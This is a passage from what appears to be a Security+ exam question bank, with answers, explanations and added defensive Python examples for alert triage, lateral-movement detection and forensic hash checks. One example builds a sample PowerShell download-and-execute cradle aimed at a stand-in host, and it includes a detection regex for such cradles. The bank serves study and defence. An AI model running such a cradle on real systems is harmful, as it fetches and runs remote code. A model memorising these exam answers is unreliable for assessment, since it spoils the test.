Why this answer

The EDR alert describes a classic fileless attack: PowerShell.exe executes an encoded command in memory, no new executable is written to disk, and persistence is achieved via a registry run key. The outbound HTTPS traffic to a rare domain indicates command-and-control (C2) communication. Fileless malware leverages legitimate system tools (like PowerShell) and runs entirely in memory, bypassing traditional file-based detection.

Exam trap

The trap here is that candidates see 'HTTPS traffic to an external domain' and jump to spyware (Option D), but the question's emphasis on 'no new executable written to disk' and 'encoded command' points directly to fileless attack, not data exfiltration as the primary behavior.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-propagating across a network (e.g., exploiting vulnerabilities or copying itself), which is not indicated by a single PowerShell launch and registry persistence. Option C is wrong because rootkit behavior involves hiding from the OS at a low level (e.g., kernel-mode hooks or driver manipulation), not simply using PowerShell and registry keys. Option D is wrong because spyware typically exfiltrates data via HTTP/HTTPS, but the core behavior here—encoded command execution in memory with no file dropped—is the hallmark of a fileless attack, not spyware.
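
An added example, not from the question bank, of the triage an analyst does on such an alert: decode the `-EncodedCommand` argument (PowerShell expects base64 of a UTF-16LE string, so that is how the sample is built), then count the fileless indicators the question lists. The alert dictionaries, the script text and the `.invalid` hostname are constructed; no real payload or domain is used.

```python
import base64
import re

# Constructed script for the sample alert: a download-and-execute cradle pointing at a
# reserved .invalid domain. Not a real payload; it exists only so the decoder has input.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://updates.example.invalid/x')"


def build_sample_alert():
    """A made-up EDR alert in the shape of the question: encoded PowerShell, nothing on disk,
    a Run key set, then an outbound connection."""
    enc = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")  # what -EncodedCommand expects
    return {
        "process": "powershell.exe",
        "cmdline": f"powershell.exe -NoP -W Hidden -Enc {enc}",
        "files_written": [],
        "registry_set": [r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"],
        "net_dst": "updates.example.invalid:443",
    }


# Constructed benign alert for contrast: a scheduled script that writes a backup archive
BENIGN_ALERT = {
    "process": "powershell.exe",
    "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1",
    "files_written": [r"D:\backups\2024-03-08.zip"],
    "registry_set": [],
    "net_dst": None,
}

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\", re.I)
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String|Invoke-WebRequest", re.I)


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def fileless_indicators(alert):
    """Return the indicators that point to fileless tradecraft; more hits = higher confidence."""
    hits = []
    decoded = decode_encoded_command(alert["cmdline"])
    if decoded is not None:
        hits.append("encoded PowerShell command")
        if CRADLE.search(decoded):
            hits.append("download/execute cradle in decoded script")
    if alert["process"].lower() == "powershell.exe" and not alert["files_written"]:
        hits.append("no payload written to disk")
    if any(RUN_KEY.search(k) for k in alert["registry_set"]):
        hits.append("Run key persistence")
    if alert.get("net_dst"):
        hits.append("outbound connection after execution")
    return hits


if __name__ == "__main__":
    alert = build_sample_alert()
    print(decode_encoded_command(alert["cmdline"]))
    print(fileless_indicators(alert))
    print(fileless_indicators(BENIGN_ALERT))
```

The point of decoding first is that the encoded blob is opaque to a file hash or a simple string match; once decoded, the cradle (IEX plus DownloadString) is the piece that confirms the attacker runs the real payload in memory rather than dropping it. The benign backup script trips none of the indicators.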

772
MCQeasy

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

A.DNS poisoning
B.Denial of service
C.Replay attack
D.Port scanning
AnswerA

DNS poisoning changes name-resolution information so users are sent to the wrong IP address. If the cache points a real name to a fake server, DNS poisoning is the most likely cause.

Why this answer

DNS poisoning (also known as DNS cache poisoning) occurs when an attacker inserts forged DNS resource records into the local DNS cache, causing subsequent queries for a legitimate domain to resolve to an attacker-controlled IP address. In this scenario, users type the correct website name, but because the local DNS cache has been altered, their browsers are redirected to a fake server. This directly matches the description of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with a man-in-the-middle attack or think that altering the local hosts file is the same mechanism, but the question specifically states the local DNS cache is altered, which is the hallmark of DNS cache poisoning.

How to eliminate wrong answers

Option B (Denial of service) is wrong because a denial-of-service attack aims to make a service unavailable by overwhelming it with traffic or exploiting vulnerabilities, not by redirecting users to a fake server after altering DNS cache. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid network transmissions (e.g., authentication tokens) to impersonate a user or gain unauthorized access, not manipulating DNS resolution. Option D (Port scanning) is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a target system, not an attack that alters DNS cache to redirect users.

773
Multi-Selectmedium

A security architect is designing a defense-in-depth strategy for a corporate network. Which of the following are fundamental principles or concepts that should be incorporated into this strategy? (Choose four.)

Select 4 answers
A.Layered security controls to provide redundancy and prevent a single point of failure
B.The principle of least privilege to limit user and system access to only what is necessary
C.Defining a separation of duties to prevent any single individual from having excessive control
D.Implementing a zero-trust model that assumes no implicit trust and requires continuous verification
E.Using a single, comprehensive security solution to minimize complexity and management overhead
F.Disabling all logging and monitoring to reduce system resource consumption
AnswersA, B, C, D

Why this answer

Defense-in-depth relies on layered security controls so that if one control fails, others continue to protect the asset; this redundancy removes a single point of failure and is the core principle of the strategy. Least privilege limits how far a compromised account or process can reach, separation of duties keeps any one person from both performing and approving a sensitive action, and a zero-trust model removes implicit trust based on network location and requires continuous verification. Each of these is an independent layer that still holds if another is bypassed.

Exam trap

The trap here is that candidates may confuse defense-in-depth with simplicity or efficiency, mistakenly choosing a single comprehensive solution because it reduces management overhead, but the exam expects recognition that redundancy through multiple layers is the defining characteristic.

774
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

A.Ignore the finding because the scanner is clearly wrong
B.Create a time-limited exception and apply compensating controls until patching is possible
C.Reinstall the disabled plugin so the scanner output matches the running configuration
D.Expose the server to the internet for faster monitoring and patch testing
AnswerB

A temporary exception with compensating controls balances business constraints and security while the team schedules a proper fix.

Why this answer

Option B is correct because the vulnerability exists in a disabled plugin, meaning the attack surface is reduced but not eliminated; residual risk remains if the plugin is re-enabled or if other dependencies are affected. Creating a time-limited exception with compensating controls (e.g., firewall rules, file permissions, SELinux policies) allows the organization to formally accept the risk until the vendor patch is applied, which aligns with standard vulnerability management processes.

Exam trap

The trap here is that candidates assume a disabled plugin means zero risk, but the exam expects you to recognize that the package is still installed and could be exploited if re-enabled, so formal risk acceptance with compensating controls is required rather than ignoring or re-enabling the plugin.

How to eliminate wrong answers

Option A is wrong because the scanner is not 'clearly wrong' — it correctly identified that the vulnerable package is installed, even though the vulnerable code path is disabled; ignoring the finding would bypass proper risk acceptance and could lead to compliance issues. Option C is wrong because reinstalling the disabled plugin would reintroduce the vulnerable code path, increasing the attack surface and contradicting the goal of reducing risk; the scanner output already reflects the installed package, and the administrator should not alter the configuration to match a false sense of security. Option D is wrong because exposing an internal server to the internet adds a new attack path to a host that is already carrying a known critical vulnerability; monitoring and patch testing can be done from the internal network or a staging environment.

775
MCQmedium

A company is concerned about ransomware and insider tampering with backups. It wants daily restore points, monthly archives, and protection if a backup drive is stolen from the storage room. Which backup design is the best answer?

A.Store all backups on a shared file server so administrators can restore them quickly.
B.Use encrypted, immutable backups with an offline or offsite copy and defined retention periods.
C.Keep only the most recent snapshot to reduce storage cost and simplify recovery.
D.Rely on RAID mirroring because it automatically creates a secure archival copy.
AnswerB

Encryption protects confidentiality, immutability resists tampering, and offline or offsite copies improve resilience against theft and ransomware.

Why this answer

Option B is correct because encrypted, immutable backups prevent ransomware from encrypting or modifying backup data, and an offline or offsite copy protects against physical theft of the backup drive. Defined retention periods satisfy the daily restore points and monthly archives requirement, while immutability ensures backup integrity even if an attacker gains access to the backup system.

Exam trap

The trap here is that candidates often confuse high-availability features like RAID with backup security, or assume that network-accessible storage is sufficient, failing to recognize that immutability and offline/offsite copies are essential for ransomware and theft protection.

How to eliminate wrong answers

Option A is wrong because storing backups on a shared file server exposes them to the same ransomware and insider threats as the production environment, and it lacks immutability or offline protection. Option C is wrong because keeping only the most recent snapshot eliminates the ability to restore from daily restore points or monthly archives, violating the stated requirements. Option D is wrong because RAID mirroring provides high availability and redundancy against disk failure, but it does not create immutable or offline copies, nor does it protect against ransomware encryption or theft of the backup drive.

776
MCQmedium

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

A.Distributed denial-of-service activity against the internal network.
B.Lateral movement using compromised credentials to pivot across the environment.
C.Port scanning from an external attacker trying to enumerate exposed services.
D.DNS tunneling used to bypass content filtering and exfiltrate data.
AnswerB

The pattern of SMB, WinRM, Kerberos, and admin-share activity strongly suggests an attacker is using one compromised workstation to move laterally and reach additional systems. That behavior matches post-compromise pivoting, often with stolen credentials or remote execution tooling. The invoice spreadsheet is likely the initial infection vector.

Why this answer

The observed behavior—a single workstation initiating SMB and WinRM sessions to 25 internal servers in rapid succession, followed by a spike in Kerberos authentication requests and attempts to access admin shares—is a classic indicator of lateral movement. The malicious invoice spreadsheet most likely gave the attacker code execution on the workstation under the logged-on user's session, and from there they are reusing that user's credentials or tokens to authenticate to server after server: WinRM for remote command execution, SMB for file access and the administrative shares (C$, ADMIN$). The Kerberos spike is the natural byproduct: every new server the attacker touches requires a service ticket (TGS) request, so dozens of requests appear within minutes. The objective is to pivot across the environment, typically to escalate privileges, stage tooling, or prepare a ransomware deployment.

Exam trap

The trap here is that candidates may mistake the Kerberos spike for a Kerberos-based attack (e.g., Kerberoasting) rather than recognizing it as a natural byproduct of lateral movement, where each new server connection triggers a TGS request, and the admin share access confirms the attacker is using compromised credentials to pivot, not just enumerate services.

How to eliminate wrong answers

Option A is wrong because DDoS activity would involve flooding the network with traffic from multiple sources, not a single workstation initiating authenticated sessions to internal servers; the pattern here is targeted and interactive, not volumetric. Option C is wrong because port scanning from an external attacker would show a broad range of IPs and ports being probed, not authenticated SMB/WinRM sessions followed by Kerberos requests; the use of valid credentials and admin share access indicates the attacker is already inside and moving laterally. Option D is wrong because DNS tunneling would manifest as unusual DNS query patterns (e.g., large or encoded queries) to exfiltrate data, not as SMB/WinRM sessions and Kerberos authentication spikes; the observed activity is about internal authentication and resource access, not data exfiltration via DNS.
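
An added example, not from the question bank, of the NetFlow detection this scenario calls for: flag a source that reaches many distinct hosts on administrative ports (SMB, WinRM, RDP) inside a sliding window. Distinct destinations, not flow count, is the signal, which is what separates the pivoting workstation from a user repeatedly opening one file share. The flow records and addresses are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Ports that indicate remote administration / file access rather than ordinary user traffic
LATERAL_PORTS = {445: "SMB", 5985: "WinRM", 5986: "WinRM-TLS", 3389: "RDP"}


def sample_flows():
    """Constructed NetFlow-style records (src, dst, dst_port, timestamp); not real traffic."""
    base = datetime(2024, 3, 8, 9, 0, 0)
    flows = []
    # 10.1.5.17 fans out to 25 distinct servers over ~11 minutes, alternating SMB and WinRM
    for i in range(25):
        port = 445 if i % 2 == 0 else 5985
        flows.append(("10.1.5.17", f"10.1.20.{i + 1}", port, base + timedelta(seconds=28 * i)))
    # 10.1.5.22 is a normal user hitting the same file share repeatedly
    for i in range(30):
        flows.append(("10.1.5.22", "10.1.20.3", 445, base + timedelta(seconds=20 * i)))
    return flows


def detect_fanout(flows, window=timedelta(minutes=15), threshold=10):
    """Flag sources that reach >= threshold DISTINCT hosts on admin ports inside a sliding window.

    Returns {src: (peak_distinct_hosts, window_start, window_end)}. A user hammering one
    share is normal; one host touching dozens of servers in minutes is not.
    """
    recent = defaultdict(deque)   # src -> (ts, dst) pairs inside the current window
    alerts = {}
    for src, dst, port, ts in sorted(flows, key=lambda f: f[3]):
        if port not in LATERAL_PORTS:
            continue
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:      # drop records that have aged out of the window
            q.popleft()
        distinct = len({d for _, d in q})
        if distinct >= threshold and distinct > alerts.get(src, (0,))[0]:
            alerts[src] = (distinct, q[0][0], ts)
    return alerts


if __name__ == "__main__":
    for src, (n, start, end) in detect_fanout(sample_flows()).items():
        print(f"{src}: {n} distinct hosts on admin ports between {start:%H:%M:%S} and {end:%H:%M:%S}")
```

In production the threshold is tuned per role (a patch-management server legitimately fans out; a finance workstation never should), and the alert is correlated with the Kerberos TGS burst and admin-share access on the destination side to confirm the pivot.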

777
MCQeasy

After several rounds of phishing simulations, management wants a metric that best shows employees are improving at recognizing suspicious messages. Which metric should security track?

A.The number of training emails sent to employees each month.
B.The percentage of users who report simulated phishing emails to security.
C.The number of spam emails blocked by the mail gateway.
D.The number of help desk tickets closed within the month.
AnswerB

Reporting suspicious messages is a strong behavioral indicator that users recognize phishing and know what to do with it. An increasing report rate is a practical metric for awareness improvement because it measures real user action, not just training attendance.

Why this answer

The percentage of users who report simulated phishing emails to security directly measures behavioral change, showing that employees are actively recognizing and acting on suspicious messages. This metric reflects the effectiveness of security awareness training by tracking the desired response—reporting—rather than passive metrics like email volume or ticket counts.

Exam trap

CompTIA often tests the distinction between input metrics (e.g., training sent) and outcome metrics (e.g., user reporting), leading candidates to choose a metric that sounds related but does not measure actual behavioral improvement.

How to eliminate wrong answers

Option A is wrong because the number of training emails sent measures only the volume of communication, not whether employees learned or applied the training; it is an input metric, not an outcome. Option C is wrong because spam emails blocked by the mail gateway is a technical control metric, unrelated to employee behavior or phishing recognition skills. Option D is wrong because help desk tickets closed within the month measures operational efficiency, not employee ability to identify phishing attempts.

778
MCQmedium

Based on the exhibit, what is the best risk response for the security team to recommend before the customer portal goes live?

A.Accept the risk now, because the WAF rule lowers exposure enough for launch.
B.Mitigate the risk by remediating the vulnerability before production release.
C.Transfer the risk to the hosting provider through a service-level agreement.
D.Avoid the risk by permanently canceling the customer portal project.
AnswerB

This is the best choice because the exhibit shows a high-likelihood, high-impact issue with a fix available in time for launch. The policy also says critical internet-facing vulnerabilities should not be accepted when remediation is available. A real fix reduces the underlying exposure more effectively than a temporary control.

Why this answer

The exhibit shows a critical SQL injection vulnerability in the customer portal that has been partially mitigated by a WAF rule. However, WAF rules can be bypassed (e.g., through encoding tricks or HTTP parameter pollution), so the residual risk remains high. The best response is to remediate the vulnerability in the application code before launch, which directly removes the root cause and aligns with the principle of defense in depth.

Exam trap

The trap here is that candidates assume a WAF provides complete protection and thus choose 'accept the risk,' but the SY0-701 exam emphasizes that compensating controls like WAFs are not a substitute for fixing the underlying vulnerability.

How to eliminate wrong answers

Option A is wrong because accepting risk with only a WAF rule in place is insufficient—WAFs are not foolproof and can be evaded by sophisticated SQLi payloads, leaving the database exposed. Option C is wrong because transferring risk to a hosting provider via SLA does not absolve the organization of liability for application-layer vulnerabilities; the provider typically only covers infrastructure uptime, not code-level flaws. Option D is wrong because permanently canceling the project is an extreme avoidance response that ignores the business need and the feasibility of fixing the vulnerability before launch.

779
MCQeasy

Based on the exhibit, what should the analyst do before opening the forensic image for examination?

A.Mount the image read-write so the analyst can begin searching immediately.
B.Calculate and compare the image hash to the source hash before analysis.
C.Defragment the original SSD so the files will be easier to search later.
D.Compress the image into a ZIP file to reduce storage usage before verifying it.
AnswerB

Hash verification confirms that the forensic image matches the original drive and has not changed during transfer or storage. This is a key evidence-handling step because it supports integrity and admissibility. The analyst should document the result in the case notes and chain of custody before examining the contents.

Why this answer

Before examining a forensic image, the analyst must verify its integrity by computing the image's hash and comparing it to the hash recorded when the image was acquired from the original source. SHA-256 is the usual choice today; MD5 and SHA-1 still appear in older tooling and case files, but both have known collision attacks, so a modern workflow records SHA-256 (often alongside a legacy hash for compatibility with existing records). A match shows the image is an exact, unaltered copy, which is critical for maintaining the chain of custody and admissibility of evidence. Option B is correct because hash verification is the foundational step in forensic analysis.

Exam trap

The trap here is that candidates may think mounting the image immediately is efficient, but they overlook the critical integrity check required before any analysis to ensure the evidence is unaltered.

How to eliminate wrong answers

Option A is wrong because mounting the image read-write would allow writes to the image, altering its data and breaking the chain of custody; forensic images must always be mounted read-only (or accessed through a write blocker). Option C is wrong because defragmenting the original SSD would modify the source data, destroying evidence and violating forensic best practices; analysis is performed on the image, not the original drive. Option D is wrong because compressing the image into a ZIP file before verification produces a new file whose hash no longer matches the acquisition hash; verification must be performed on the image exactly as acquired, and any later compression or conversion must itself be documented and re-hashed.
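
An added example, not from the question bank, of the verification step itself: hash the image in chunks (so a multi-terabyte file never has to fit in memory), compare against the hash the acquisition tool recorded, and show that a single flipped bit anywhere in the image makes the comparison fail. The image bytes and the "acquisition hash" are constructed in the example; in a real case the expected value comes from the imaging tool's log and the chain-of-custody form.

```python
import hashlib
import io

CHUNK = 1024 * 1024  # hash in 1 MiB pieces so a multi-terabyte image never has to fit in memory


def sha256_of_stream(fp):
    """Stream a file-like object through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    for chunk in iter(lambda: fp.read(CHUNK), b""):
        h.update(chunk)
    return h.hexdigest()


def verify_image(image_fp, acquisition_hash):
    """Compare the image as it sits on the analysis workstation with the hash the acquisition
    tool recorded. Returns (matches, computed_hash) so both values can go into the case notes."""
    computed = sha256_of_stream(image_fp)
    return computed == acquisition_hash.strip().lower(), computed


def constructed_image(size=3 * CHUNK + 17):
    """Deterministic filler standing in for a disk image; not a real image."""
    pattern = b"\x55\xaa"
    return (pattern * (size // len(pattern) + 1))[:size]


def demo():
    image = constructed_image()
    acquisition_hash = sha256_of_stream(io.BytesIO(image))   # what the imaging tool would have logged
    ok, _ = verify_image(io.BytesIO(image), acquisition_hash)
    tampered = bytearray(image)
    tampered[CHUNK + 5] ^= 0x01                               # flip one bit in the middle of the image
    ok_tampered, _ = verify_image(io.BytesIO(bytes(tampered)), acquisition_hash)
    return ok, ok_tampered


if __name__ == "__main__":
    intact, tampered = demo()
    print("intact image verifies:", intact, "| tampered image verifies:", tampered)
```

On a real workstation the same check is usually `sha256sum image.dd` compared by eye or script against the acquisition record; the value, the time, and the analyst's name then go into the case notes before the image is mounted read-only.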

780
MCQmedium

A company is signing a contract with a SaaS expense platform. Security wants the vendor to notify the company within 24 hours of a confirmed incident, maintain customer data segregation, and allow the company to verify security commitments if required. Which control should be added to the agreement?

A.A non-disclosure agreement only
B.A security addendum with SLA terms
C.A verbal assurance from the account representative
D.The vendor's standard public terms without changes
AnswerB

A security addendum can define incident notice windows, segregation requirements, and enforceable service commitments.

Why this answer

A security addendum or contract clause set is the right place to define incident notification timing, data segregation expectations, and verification rights. These requirements need to be written into a binding agreement so both sides understand their responsibilities and so the customer has leverage if the vendor does not comply. This is stronger than informal assurances or generic privacy language.

How to eliminate wrong answers

An NDA is about secrecy, not measurable security obligations. A verbal promise is not enforceable and is weak evidence for oversight or audits. Default public terms often favor the vendor and may not cover incident timing or security commitments in enough detail. The organization needs a contract mechanism that clearly states the control expectations, not just a confidentiality promise.

781
Multi-Selectmedium

A security architect is designing a multi-tier web application that must meet strict compliance requirements for data confidentiality and integrity. Which three of the following security architecture principles should be applied? (Choose three.)

Select 3 answers
A.Implement defense in depth by layering multiple security controls.
B.Place the web server, application server, and database server on the same subnet for efficiency.
C.Use network segmentation to isolate the database tier from direct internet access.
D.Grant all users the same level of access to simplify administration.
E.Apply the principle of least privilege to service accounts and user roles.
F.Rely solely on a single firewall at the network perimeter for protection.
AnswersA, C, E

Why this answer

Defense in depth is correct because it mandates layering multiple security controls (e.g., firewalls, IDS/IPS, encryption, access controls) so that if one control fails, others still protect the data. This directly supports strict compliance requirements for confidentiality and integrity by avoiding a single point of failure. Network segmentation is correct because the database tier, which holds the regulated data, should only be reachable from the application tier, never from the internet or the web tier directly. Least privilege for service accounts and user roles is correct because the application's database account should hold only the rights the application needs, so a compromised web or application server cannot read or alter more than it must.

Exam trap

The trap here is that candidates often confuse 'efficiency' with 'security' and choose the same-subnet option, forgetting that compliance requires isolation between tiers to prevent easy lateral movement after a breach.

782
MCQeasy

A manager wants files on a stolen laptop to remain unreadable even if the drive is removed and connected to another computer. Which control should be implemented?

A.File compression
B.Full-disk encryption
C.Packet filtering
D.Digital signing
AnswerB

Full-disk encryption protects data stored on the laptop by making the contents unreadable without the proper key or passphrase. If the drive is removed and attached to another computer, the data still remains protected because it is encrypted at rest. This is a common and effective control for portable devices that may be lost or stolen.

Why this answer

Full-disk encryption (FDE) encrypts the entire storage volume, including the operating system, applications, and all user data. When the drive is removed and connected to another computer, the encrypted data remains inaccessible without the correct decryption key or passphrase, ensuring files stay unreadable. This directly addresses the manager's requirement for data confidentiality even after physical theft.

Exam trap

The trap here is that candidates confuse file compression with encryption, thinking that compressing files makes them unreadable, but compression is a reversible encoding process with no security properties.

How to eliminate wrong answers

Option A is wrong because file compression only reduces file size and does not provide any encryption or access control; compressed files can be read by any system with decompression software. Option C is wrong because packet filtering is a network security mechanism that controls traffic based on IP addresses, ports, or protocols; it has no effect on data at rest on a local drive. Option D is wrong because digital signing provides integrity and authenticity (proof that data has not been altered and came from a known signer) but does not make the data unreadable; a signed file is still plaintext to anyone who holds the drive.

783
MCQmedium

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

A.Move the console to a separate management network and restrict access to admin hosts only.
B.Increase the number of shared passwords so administrators can log in faster.
C.Leave the console exposed but shorten the password expiration period.
D.Disable logging so failed attempts do not generate noise.
AnswerA

Administrative interfaces should not be reachable from ordinary user endpoints. Moving the console to a dedicated management network and allowing access only from approved admin systems reduces the attack surface and limits who can even attempt to log in. That is a strong hardening control because it addresses both exposure and misuse. If a workstation should never manage servers, network-level segmentation is the right place to enforce that boundary before authentication is even attempted.

Why this answer

The administrative web console should be isolated on a separate management network (out-of-band management) with strict access control lists (ACLs) allowing only designated admin hosts. This prevents lateral movement from compromised user workstations and eliminates the attack surface exposed to all authenticated employees. Network segmentation is a fundamental defense-in-depth control for managing critical infrastructure, as it enforces the principle of least privilege at the network layer.

Exam trap

CompTIA often tests the misconception that password policies (rotation, complexity, or expiration) are sufficient hardening for exposed management interfaces, when in fact network segmentation and access control are the primary mitigations.

How to eliminate wrong answers

Option B is wrong because increasing the number of shared passwords does not address the root cause of unauthorized access; it actually weakens accountability and increases the risk of credential theft. Option C is wrong because shortening the password expiration period does not prevent an attacker from reaching the console; it only slightly reduces the window of opportunity for a compromised password, while the console remains exposed to all users. Option D is wrong because disabling logging removes visibility into security events, violating the fundamental security principle of auditability and making incident response impossible.

784
MCQ · medium

A development manager wants to copy a production customer database into a test environment so testers can reproduce a bug. The database contains names, addresses, and payment tokens. What is the best security practice before the copy is made?

A. Copy the production database unchanged and limit access to the QA team.
B. Mask, tokenize, or replace sensitive fields with approved test data before moving it.
C. Compress the database export to reduce storage and transfer time.
D. Encrypt the database backup and give developers the decryption key.
Answer: B

Masking or tokenizing sensitive fields is the best practice because it preserves the data structure needed for testing while reducing privacy risk. The test environment should not contain raw customer information unless there is a strong approved need. Using approved test data limits exposure if the environment is compromised or shared more broadly than intended.

Why this answer

Option B is correct because copying production data containing sensitive information (names, addresses, payment tokens) into a test environment without sanitization violates data minimization and privacy principles (e.g., GDPR, PCI DSS). The best practice is to apply data masking, tokenization, or substitution with realistic but non-sensitive test data before the copy, ensuring that the test environment does not expose real customer data. This prevents accidental data leakage and reduces compliance risk while still allowing testers to reproduce the bug with functionally equivalent data.

Exam trap

The trap here is that candidates may think limiting access (Option A) is sufficient, but the exam emphasizes that data protection must be applied to the data itself, not just to access controls, especially when moving data to a less secure environment.

How to eliminate wrong answers

Option A is wrong because copying the production database unchanged and limiting access to the QA team does not eliminate the sensitive data from the test environment; any access control misconfiguration or insider threat could expose real customer data, and it violates the principle of least privilege and data minimization. Option C is wrong because compressing the database export only reduces storage and transfer time but does nothing to protect sensitive fields; it is a performance optimization, not a security control.

785
MCQ · medium

A payroll SaaS provider has passed initial review, but before contract signing it announces that customer data will be processed by a new subcontractor in another country. The business wants to keep the onboarding timeline short, but security still needs assurance that the change does not increase exposure. What is the BEST next step?

A. Approve the vendor because the primary provider already passed the initial review.
B. Update the third-party risk assessment and require evidence of the subcontractor's controls before approval.
C. Wait until the first quarterly audit to review the subcontractor change.
D. Accept the change if the vendor provides a marketing brochure describing its security program.
Answer: B

This is the best next step because the change in subcontracting materially alters the risk profile. Security should reassess the provider, review the downstream party's controls, and confirm contractual obligations such as incident notification, data handling, and location requirements. This balances speed with due diligence and ensures the organization has current evidence before customer data is exposed to a new party.

Why this answer

The correct answer is B because the introduction of a new subcontractor in a different country represents a material change to the data processing environment, which invalidates the initial risk assessment. Security must update the third-party risk assessment to evaluate the subcontractor's controls, such as data protection, encryption standards, and compliance with local regulations, before approval. This ensures that the change does not increase exposure, even if the primary provider passed initial review.

Exam trap

The trap here is that candidates assume passing initial review means all future changes are automatically acceptable, overlooking the need for reassessment when the data processing environment changes, especially with a new subcontractor in a different country.

How to eliminate wrong answers

Option A is wrong because approving the vendor solely based on the primary provider's initial review ignores the material change introduced by the subcontractor, which could have weaker security controls or different legal obligations. Option C is wrong because waiting until the first quarterly audit leaves a gap where the subcontractor could be processing data without any assurance of security, increasing exposure during that period. Option D is wrong because a marketing brochure is not a reliable source of evidence; it lacks verifiable details about the subcontractor's actual security controls, such as encryption protocols, access controls, or audit reports.

786
MCQ · medium

An external auditor asks for proof that quarterly privileged access reviews were completed and that any exceptions were tracked to closure during the last year. Which evidence is MOST appropriate to provide?

A. A screenshot of one administrator's account showing current privileges.
B. Signed access review records and remediation tickets from the access management process.
C. The security policy that says access reviews must happen every quarter.
D. An email from the system administrator stating that reviews were completed on time.
Answer: B

This is the best evidence because it directly shows the process was performed and that findings were handled. Signed review records demonstrate that quarterly reviews occurred, and remediation or exception tickets show that identified issues were tracked and resolved. Auditors look for traceable, repeatable evidence rather than isolated screenshots or verbal confirmation, so process records are the strongest support.

Why this answer

Option B is correct because signed access review records provide verifiable proof that quarterly reviews were conducted, and remediation tickets demonstrate that any exceptions (e.g., excessive privileges) were tracked and resolved. This aligns with the principle of audit evidence: it must be objective, verifiable, and show a complete chain of actions from review to closure. A screenshot or policy alone lacks the audit trail of actual completion and exception handling.

Exam trap

The trap here is that candidates confuse policy documentation (Option C) or informal communication (Option D) with actual audit evidence, failing to recognize that only signed records and remediation tickets provide the verifiable, objective proof required by an external auditor.

How to eliminate wrong answers

Option A is wrong because a screenshot of one administrator's current privileges only shows a point-in-time snapshot, not evidence that quarterly reviews were completed or that exceptions were tracked to closure over the last year. Option C is wrong because a security policy stating that reviews must happen every quarter is a directive, not proof that the reviews actually occurred or that exceptions were resolved. Option D is wrong because an email from the system administrator is hearsay evidence; it is not an objective, auditable record and does not provide the signed review records or remediation tickets required for compliance.

787
Multi-Select · hard

A Windows laptop is believed to be involved in a credential-theft incident. It is still powered on, connected to Wi-Fi, and the user reports that the screen recently locked by itself. The SOC can reach the device remotely through EDR. Which two actions should be taken before the laptop is shut down? Select two.

Select 2 answers
A. Capture volatile data such as running processes and active network connections while the system is still live.
B. Place the endpoint into network isolation through the EDR console to stop further attacker communication.
C. Run a full antivirus scan immediately, because the scan report will serve as the primary evidence.
D. Reboot the laptop into Safe Mode so the attacker’s code will not load.
E. Power off the laptop immediately to prevent the incident from spreading further.
Answers: A, B

Volatile data disappears on shutdown, so collecting it first protects the most transient evidence. Running processes and live connections can reveal malware, remote-control tools, or current attacker activity. This is especially important when the device is still powered on and reachable through EDR.

Why this answer

Option A is correct because capturing volatile data (e.g., running processes, active network connections, memory contents) is a critical first step in forensic response. This data resides in RAM and is lost when the system is powered off, so it must be collected while the laptop is still live to preserve evidence of the attacker's current activities, such as active credential theft tools or command-and-control connections.

Exam trap

The trap here is that candidates often choose to immediately power off or run an antivirus scan, mistakenly believing these actions contain the incident, when in fact they destroy critical volatile evidence and violate forensic best practices.

788
Multi-Select · medium

A company uses a SaaS CRM platform. The provider patches the application and underlying infrastructure. Which two responsibilities remain with the company? Select two.

Select 2 answers
A. Set up MFA, conditional access, and user-role assignments for tenant accounts.
B. Patch the SaaS application's source code on the provider's servers.
C. Decide what customer data is entered into the service and how it is shared.
D. Replace the provider's hypervisors with company-owned hardware.
E. Maintain the provider's network firewalls and datacenter cooling systems.
Answers: A, C

Identity governance, MFA, and tenant permissions remain customer responsibilities in SaaS environments, as does deciding what customer data is entered into the service and how it is shared.

Why this answer

Option A is correct because in a SaaS model, the customer retains responsibility for securing their tenant accounts, including configuring multi-factor authentication (MFA), conditional access policies, and role-based access control (RBAC) for users. These are identity and access management (IAM) controls that the provider cannot enforce on behalf of the customer, as they depend on the customer's specific user directory and security policies.

Exam trap

The trap here is that candidates confuse the SaaS model with IaaS or PaaS, mistakenly thinking the customer is responsible for patching the application or infrastructure, when in fact the customer's duties are limited to account and data governance.

789
MCQ · medium

A security manager at a hospital is reviewing the annual vendor risk assessment for a cloud-based electronic health record (EHR) provider. The provider's SOC 2 Type II report, issued six months ago, identifies a significant deficiency in logical access controls: the provider failed to revoke access for former employees in a timely manner. The provider's management has asserted that this deficiency has been fully remediated, but the next SOC 2 audit is not scheduled for another eight months. The hospital's data protection policy requires that any vendor handling protected health information (PHI) must have a current SOC 2 Type II report with no unresolved significant deficiencies. Which of the following is the most appropriate next step for the security manager?

A. Accept the vendor's assertion that the deficiency has been remediated and continue the relationship as is.
